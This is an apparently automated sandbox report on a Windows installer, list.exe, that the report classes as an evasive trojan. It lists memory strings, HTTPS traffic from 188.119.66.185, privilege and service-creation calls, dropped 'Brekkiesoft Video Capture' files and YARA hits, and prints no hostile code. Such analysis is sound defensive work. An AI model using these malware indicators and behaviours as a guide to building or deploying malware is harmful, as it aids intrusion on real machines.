                    Source: svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375535185.000001769B25E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1376152284.000001769B270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375456752.000001769B267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376138773.000001769B268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000003.00000003.1375609527.000001769B24A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1375621378.000001769B249000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375663325.000001769B231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375609527.000001769B24A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                    Source: list.exe, 00000000.00000002.2501420585.0000000002081000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252011519.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252079119.0000000002081000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000003.1254668449.0000000003230000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2502938488.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000003.1254793591.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2502072974.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.7:49795 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.7:49795 version: TLS 1.2
                    Source: is-B9LPS.tmp.2.drBinary or memory string: DirectDrawCreateExmemstr_47d3fa75-6
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0042F520 NtdllDefWindowProc_A,2_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00423B84 NtdllDefWindowProc_A,2_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004125D8 NtdllDefWindowProc_A,2_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00478AC0 NtdllDefWindowProc_A,2_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,2_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,2_2_0042E934
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555E4
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004706A82_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004809F72_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004352C82_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004673A42_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0043DD502_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0043035C2_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004444C82_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004345C42_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00444A702_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00486BD02_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00430EE82_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0045F0C42_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004451682_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0045B1742_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004694042_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004455742_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004519BC2_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00487B302_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0048DF542_2_0048DF54
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_004010006_2_00401000
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_004067B76_2_004067B7
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609660FA6_2_609660FA
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6092114F6_2_6092114F
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6091F2C96_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096923E6_2_6096923E
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6093323D6_2_6093323D
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095C3146_2_6095C314
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609503126_2_60950312
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094D33B6_2_6094D33B
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6093B3686_2_6093B368
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096748C6_2_6096748C
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6093F42E6_2_6093F42E
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609544706_2_60954470
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609615FA6_2_609615FA
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096A5EE6_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096D6A46_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609606A86_2_609606A8
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609326546_2_60932654
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609556656_2_60955665
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094B7DB6_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6092F74D6_2_6092F74D
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609648076_2_60964807
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094E9BC6_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609379296_2_60937929
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6093FAD66_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096DAE86_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094DA3A6_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60936B276_2_60936B27
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60954CF66_2_60954CF6
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60950C6B6_2_60950C6B
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60966DF16_2_60966DF1
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60963D356_2_60963D35
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60909E9C6_2_60909E9C
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60951E866_2_60951E86
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60912E0B6_2_60912E0B
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60954FF86_2_60954FF8
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C396C96_2_02C396C9
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C396876_2_02C39687
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C397576_2_02C39757
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C1BAFD6_2_02C1BAFD
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C22A806_2_02C22A80
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C1D32F6_2_02C1D32F
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C170C06_2_02C170C0
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C0E07F6_2_02C0E07F
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C2267D6_2_02C2267D
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C1B6096_2_02C1B609
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C1874A6_2_02C1874A
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C1BF156_2_02C1BF15
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C20DB46_2_02C20DB4
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\BrekkiesoftVideoCapture\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: String function: 004460A4 appears 59 times
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: String function: 02C17760 appears 32 times
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: String function: 02C22A10 appears 135 times
                    Source: list.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: list.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: list.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-FUIGA.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-FUIGA.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-FUIGA.tmp.2.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.6.drStatic PE information: Number of sections : 19 > 10
                    Source: is-1B315.tmp.2.drStatic PE information: Number of sections : 19 > 10
                    Source: list.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs list.exe
                    Source: list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs list.exe
                    Source: list.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@14/31@1/1
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C0F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,6_2_02C0F8D0
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,2_2_00455E0C
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: CreateServiceA,6_2_00401C47
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: CreateServiceA,6_2_00401822
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: CreateServiceA,6_2_00401CAB
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0046E0E4 GetVersion,CoCreateInstance,2_2_0046E0E4
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_004016B0 StartServiceCtrlDispatcherA,GlobalFree,6_2_004016B0
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_004016B0 StartServiceCtrlDispatcherA,GlobalFree,6_2_004016B0
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6452:120:WilError_03
                    Source: C:\Users\user\Desktop\list.exeFile created: C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmpJump to behavior
                    Source: Yara matchFile source: 6.0.bsoftvideocapture33.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000000.1278089923.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2504041070.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-7DT4P.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\list.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: bsoftvideocapture33.exe, bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: bsoftvideocapture33.exe, bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
